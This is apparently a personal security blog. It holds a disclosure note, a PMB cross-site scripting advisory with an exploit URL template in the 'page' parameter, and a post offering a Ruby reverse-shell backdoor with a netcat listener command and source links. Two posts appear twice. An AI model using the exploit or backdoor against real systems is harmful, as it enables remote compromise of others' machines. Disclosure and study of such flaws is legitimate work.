I got listed on Olark Hall of Fame for responsibly disclosed security vulnerabilities.
http://www.olark.com/customer/portal/articles/1237352
http://www.olark.com/customer/portal/articles/1237352
mardi 8 octobre 2013
lundi 7 octobre 2013
PMB - Cross Site-Scripting # XSS
The vulnerable code is located at /[pmb]/index.php (includes)
The issue results from insufficient sanitization of user-supplied data through "page" parameter. This could permit a remote attacker to create a malicious URI link that include hostile HTML and script code.
[~] Exploit
http://[site]/[pmb_path]/index.php?lvl=section_see&id=-1&location=1&page=[XSS]&nbr_lignes=1&dcote=&lcote=1&nc=&main=&ssub=&plettreaut=
Nota: Reported on 03/20/2013 - Fixed
The issue results from insufficient sanitization of user-supplied data through "page" parameter. This could permit a remote attacker to create a malicious URI link that include hostile HTML and script code.
[~] Exploit
http://[site]/[pmb_path]/index.php?lvl=section_see&id=-1&location=1&page=[XSS]&nbr_lignes=1&dcote=&lcote=1&nc=&main=&ssub=&plettreaut=
Nota: Reported on 03/20/2013 - Fixed
Ruby - Shell_Reverse_Tcp
A very simple and basic reverse shell backdoor written in Ruby language; When executed in client's machine, you get an interactive shell(/bin/sh).
Payload.rb
Server.rb
NOTA: you can use Netcat (nc -l -p 4444) rather than server.rb.
Source Code: http://pastebin.com/WfrHX94m and http://pastebin.com/vp2ugUEY
Payload.rb
Server.rb
NOTA: you can use Netcat (nc -l -p 4444) rather than server.rb.
Source Code: http://pastebin.com/WfrHX94m and http://pastebin.com/vp2ugUEY
Inscription à :
Articles (Atom)